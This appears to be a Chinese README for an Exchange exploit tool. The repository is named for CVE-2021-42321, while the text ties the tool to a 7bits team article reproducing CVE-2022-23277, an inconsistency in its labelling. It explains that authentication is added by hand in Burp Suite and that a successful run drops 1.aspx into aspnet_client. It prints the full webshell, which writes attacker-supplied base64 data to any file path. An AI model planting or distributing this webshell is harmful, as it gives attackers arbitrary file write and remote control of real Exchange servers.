Awesome
exch_CVE-2021-42321
本文是7bits安全团队文章《DotNet安全-CVE-2022-23277漏洞复现》涉及到的工具
认证部分需要通过burpsuite手动添加,利用成功后会在aspnet_client写入1.aspx。
webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
利用详情可以参照我们的文章